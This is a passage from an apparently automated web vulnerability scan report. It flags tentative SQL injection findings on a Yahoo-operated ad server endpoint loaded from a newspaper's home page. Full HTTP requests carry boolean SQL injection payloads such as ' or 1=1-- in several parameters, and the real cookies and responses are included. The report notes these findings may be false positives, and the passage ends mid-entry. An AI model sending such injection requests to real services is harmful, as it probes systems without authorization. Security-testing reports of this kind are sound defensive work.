GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d1--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:23:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=cah6oal6ftjvu&t=1291767806;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19343


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163iq7aak/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=5fe8d8d0-0261-11e0-9680-5f66a70d32a8/B=nyM1A0S0q9w-/J=1291767806597134/K=7yw44sfu15oFXuUWnv7nKQ/EXP=1291775006/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=5fe8d8d0-0261-11e0-9680-5f66a70d32a8&T=19een5mpp%2fX%3d1291767806%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d1035653421%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1ZmU4ZDhkMC0wMjYxLTExZTAtOTY4MC01ZjY2YTcwZDMyYTgiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjUyODg1NyIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d29ABB444&U=13ui8q641%2fN%3dnyM1A0S0q9w-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|5fe8d8d0-0261-11e0-9680-5f66a70d32a8--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac16.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aDZlNGRjNShnaWQkNWZlOGQ4ZDAtMDI2MS0xMWUwLTk2ODAtNWY2NmE3MGQzMmE4LHN0JDEyOTE3Njc4MDY1Mjg4NTcsc2kkMjExMDUxLHYkMS4wLGFpZCRtdWhjSzBTMHF5ay0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d2--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:23:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=ftgh8cp6ftjvu&t=1291767806;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19333


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163h8r1o2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=602f48c4-0261-11e0-b779-0b7c1fdfcc42/B=V.4cA0S0q90-/J=1291767807058589/K=qJHQXaL3_Vc3bVYsBCcV6A/EXP=1291775007/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=602f48c4-0261-11e0-b779-0b7c1fdfcc42&T=19ek3gtk7%2fX%3d1291767807%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2303027397%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI2MDJmNDhjNC0wMjYxLTExZTAtYjc3OS0wYjdjMWZkZmNjNDIiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjk5MDExNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d8CA8B444&U=13uqpesp1%2fN%3dV.4cA0S0q90-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|602f48c4-0261-11e0-b779-0b7c1fdfcc42--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac1.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHZ2ZWZocShnaWQkNjAyZjQ4YzQtMDI2MS0xMWUwLWI3NzktMGI3YzFmZGZjYzQyLHN0JDEyOTE3Njc4MDY5OTAxMTQsc2kkMjExMDUxLHYkMS4wLGFpZCRfR3lEQVVTMHFJdy0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h
...[SNIP]...

1.119. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:30:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=7du40c56ftkd1&t=1291768225;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19302


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ph2bt2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=59588b4a-0262-11e0-bc79-3f914c26f4f7/B=brIcA0S0q98-/J=1291768225085491/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=59588b4a-0262-11e0-bc79-3f914c26f4f7&T=19e0vj2eg%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3572157642%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTU4OGI0YS0wMjYyLTExZTAtYmM3OS0zZjkxNGMyNmY0ZjciIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTAxMzA2OCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d49A9B444&U=13u1adgp2%2fN%3dbrIcA0S0q98-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|59588b4a-0262-11e0-bc79-3f914c26f4f7--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac4.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGloNmIwZShnaWQkNTk1ODhiNGEtMDI2Mi0xMWUwLWJjNzktM2Y5MTRjMjZmNGY3LHN0JDEyOTE3NjgyMjUwMTMwNjgsc2kkMjExMDUxLHYkMS4wLGFpZCRLcm9WcGtTMHFVay0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:30:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=d6sobqp6ftkd1&t=1291768225;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19313


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=1631s5m15/M=600996958.601271502.459798051.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=5991a5ba-0262-11e0-bc7c-8773473a0330/B=2G8cA0S0qUw-/J=1291768225461074/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=1974817592210663262/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=5991a5ba-0262-11e0-bc7c-8773473a0330&T=19euq7usk%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2681437517%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTkxYTViYS0wMjYyLTExZTAtYmM3Yy04NzczNDczYTAzMzAiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTM4NzY1NiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3dEAAAB444&U=13u52avij%2fN%3d2G8cA0S0qUw-%2fC%3d600996958.601271502.459798051.475726551%2fD%3dAP15%2fB%3d1974817592210663262%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|5991a5ba-0262-11e0-bc7c-8773473a0330--><!--TRK:a:1974817592210663262,m:600996958.601271502.459798051.475726551--><!--fac11.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aDdodjg2aChnaWQkNTk5MWE1YmEtMDI2Mi0xMWUwLWJjN2MtODc3MzQ3M2EwMzMwLHN0JDEyOTE3NjgyMjUzODc2NTYsc2kkMjExMDUxLHYkMS4wLGFpZCRTT1cxZmtTMHF1by0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0
...[SNIP]...

1.120. http://open.ad.yieldmanager.net/a1 [sltId2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The sltId2 parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sltId2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

